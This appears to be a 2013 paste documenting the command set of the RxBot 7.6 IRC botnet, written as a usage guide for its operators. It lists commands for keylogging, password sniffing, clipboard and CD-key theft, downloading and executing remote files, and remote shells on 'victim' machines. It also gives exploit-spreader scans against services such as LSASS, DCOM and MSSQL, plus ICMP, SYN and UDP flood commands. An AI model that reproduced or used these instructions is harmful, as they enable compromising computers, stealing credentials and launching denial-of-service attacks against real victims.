Advertisement
Guest User

RxBot 7.6 Commands

a guest
Feb 5th, 2013
281
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.97 KB | None | 0 0
  1. .scanall -r * ÇãÑ ááÈÍË Úä ÖÍÇíÇ Ýí ÇáÔÈßÉ ÇáÎÇÕÉ ÈÇáÖÍíÉ
  2. .login * login password
  3. .logout * logout
  4. .who * who
  5. .getclip * get clip board data
  6. .currentip * current ip scanning
  7. .rloginserver * rlogin server (login with putty)
  8. .get * get filename.zip
  9. .redirect * redirect
  10. .update * update Http://Www.Website.Com/File.exe BotID.
  11. .download * download http://Website.Com/File.exe C:\File.exe 1 ( 1 = execute : 0 = don`t execute )
  12. .execute * execute C:\file.exe
  13. .findfile * findfile file.exe C:\
  14. .findfilestop * findfilestop
  15. .rename * rename botfilename.exe botfilename2.exe
  16. .mode * mode +i-x
  17. .version * version
  18. .gethost * get host info
  19. .delay * delays action
  20. .secure * secures bot
  21. .securestop * stopsecure
  22. .unsecure * unsecures bot
  23. .ident on * enable ident server
  24. .ident off * disable ident server
  25. .keylog on * enable key loger
  26. .keylog off * disable key loger
  27. .join * join #Channel
  28. .part * part #Channel
  29. .netinfo * netinfo
  30. .sysinfo * sysinfo
  31. .raw * raw #Channel +o Himmler
  32. .prefix * prefix $ (change prefix to...)
  33. .open * open File
  34. .server * server Irc.AnotherServer.Net
  35. .dns * dns host.name.net
  36. .addalias * addalias " untested "
  37. .privmsg * privmsg #Channel Hello / Nickname Fuck u
  38. .action * perform action
  39. .cycle * cycle (do something repetitive) eg .cycle 5 join #lolol
  40. .die * kill ur bot.exe " is will be back after the next restart
  41. .email * email mx3.hotmail.com From@Hotmail.Com To@yaoo.Com Subject Msg
  42. .httpcon * httpcon
  43. .upload * upload
  44. .reconnect * reconnect
  45. .disconnect * disconnect
  46. .status * status
  47. .mirccmd * mirccmd
  48. .cmd * remote cmd (.opencmd to activate)
  49. .system reboot * restart bot victim machine
  50. .system shutdown * shutdown bot victim machine
  51. .system logoff * logoff bot victim machine
  52. .threads * list threads
  53. .killthread all * kill all threads
  54. .getcdkeys * get cdkeys for windows / games
  55. .driveinfo * get drivers info
  56. .opencmd * opencmd
  57. .cmdstop * stopcmd
  58. .httpserver * httpserver C:\ or D:\
  59. .httpstop * stop http server
  60. .tftpserver * start tftp
  61. .tftpstop * stop tftp
  62. .crash * crash bot victim machine ( destroy all system )
  63. .findpass * get bot victim passwords
  64. .nick * change bot nick
  65. .log * list bot log
  66. .clearlog * clear log list
  67. .procs * list all files running in bot victim P.c
  68. .procsstop * procsstop File.exe
  69. .killproc * killprocs File.exe
  70. .delete * delete C:\File.exe
  71. .list * list *.exe or *.zip or *.rar any extensions u want list from bot victim P.c
  72. .visit * visit http://www.website.com ( hiden )
  73. .readfile * readfile C:\file.txt
  74. .psniff on * pass sniff on
  75. .psniff off * pass sniff off
  76. .remove * remove bot completly from vistim pc
  77.  
  78. psniff can steal any information about
  79. (Bots Net) (Ftp) (Php) (Http) (Mirc) (Users) (Accounts) (Admins) (Opers )
  80.  
  81. .net start
  82. .net stop
  83. .net pause
  84. .net continue
  85. .net delete
  86. .net share
  87. .net user
  88. .net send
  89. .capture video
  90. .capture screen
  91. .capture drivers
  92. .capture frame
  93. .clone irc.server.net:6667 #Channel
  94. .c_join
  95. .c_part
  96. .C_raw
  97. .c_mode
  98. .c_nick
  99. .c_privmsg
  100. .c_notice
  101. .c_rndnick
  102. .clonestop
  103. .c_quit
  104.  
  105. -=-=-=-=-=-=-=-=-=-=-=-
  106. ; Using Exploits ;
  107. -=-=-=-=-=-=-=-=-=-=-=-
  108. ri0t r00t b0t comes with many exploits listed below is how to use them:
  109.  
  110. -r = random range scanner from the " Bot Ip " Ex: " the bot connect from ip ( 62.150.15.15 )
  111. the -r scanning from 62.150.0.0 to 62.150.255.255 but in random method
  112.  
  113. -b = same -r but in Sequential method from 62.150.0.0 to 62.150.255.255
  114. -a = long range scanner from first range of bot ip Ex: 62.0.0.0 to 62.255.255.255
  115. -s = silent u can used with all Bot Commands, no reply msg from the bots
  116. x = ip range ex: 0 to 255
  117. u can scan fot ip range u choiced Ex: advscan lsass 100 5 999 62.150.x.x -r
  118. 100 = scanner threads
  119. 5 = delay in sec
  120. 999 = time of scanner
  121.  
  122. .advscan lsass 100 5 999 -r * Lsass Exploit Spreader Using Port 445
  123. .advscan iis5ssl 100 5 999 -b * IIS 5 SSL Exploit Spreader Using Port 443
  124. .advscan dcom135 100 5 999 -a * Dcom Exploit Spreader Using Port 135
  125. .advscan dcom445 100 5 999 -r -s * Dcom Exploit Spreader Using Port 445
  126. .advscan dcom1025 100 5 999 -b -s * Dcom Exploit Spreader Using Port 1025 ( is shit )
  127. .advscan dcom2-135 100 5 999 -a -s * Dcom2 Exploit Spreader Using Port 135
  128. .advscan dcom2-445 100 5 999 -r * Dcom2 Exploit Spreader Using Port 445
  129. .advscan beagle1 100 5 999 -r * Bagle Exploit Spreader Using Port 2745
  130. .advscan beagle2 100 5 999 -r * Bagle2 Exploit Spreader Using Port 2745
  131. .advscan webdav 100 5 999 -r * WebDav Exploit Spreader Using Port 80
  132. .advscan wkssvc 100 5 999 -r * Wks Exploit Spreader Using Port 135
  133. .advscan wkssvc2 100 5 999 -r * Wks Exploit Spreader Using Port 445
  134. .advscan dameware 100 5 999 -r * DameWare Exploit Spreader Using Port 6129
  135. .advscan upnp 100 5 999 -r * UPNP Exploit Spreader Using Port 5000
  136. .advscan mydoom 100 5 999 -r * MyDoom Exploit Spreader Using Port 3127
  137. .advscan netbios 100 5 999 -r * NetBios Exploit Spreader Using Port 139
  138. .advscan ntpass 100 5 999 -r * NB+NP Exploit Spreader Using Port 445
  139. .advscan mssql 100 5 999 -r * MSSQL Exploit Spreader Using Port 1433
  140. .advscan vnc 100 5 999 -r * VNC Exploit spreader Using Port 5900
  141. .advscan optix 100 5 999 -r * Optix Trojan Spreader Using Port 3410
  142. .advscan sub7 100 5 999 -r * Sub7 Trojan Spreader Using Port 27374
  143. .advscan netdevil 100 5 999 -r * NetDevil Trojan Spreader Using Port 901
  144. .advscan netdevil2 100 5 999 -r * NetDevil Trojan Spreader Using Port 903
  145. .scanstats * Get Scan Stats
  146. .scanstop * Stop Scanning
  147.  
  148. -=-=-=-=-=-=-=-=-=-=-=-=-
  149. ; Flooders for the nubs ;
  150. -=-=-=-=-=-=-=-=-=-=-=-=-
  151.  
  152. .icmpflood * icmpflood 62.150.15.15 99999
  153. .synflood * synflood 62.150.15.15 1000 2000
  154. .udpflood * udpflood Ip Number Size Delay
  155. .pingflood * pingflood Ip Number Size Delay
  156. .tcpflood * Ip Port r
  157.  
  158. .icmpstop
  159. .tcpstop
  160. .synstop
  161. .udpstop
  162. .pingstop
  163.  
  164.  
  165. Thats all, have a play around with each command to get use to how the bot works and
  166. how to control it better and so forth.
  167.  
  168. ~h1t3m
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement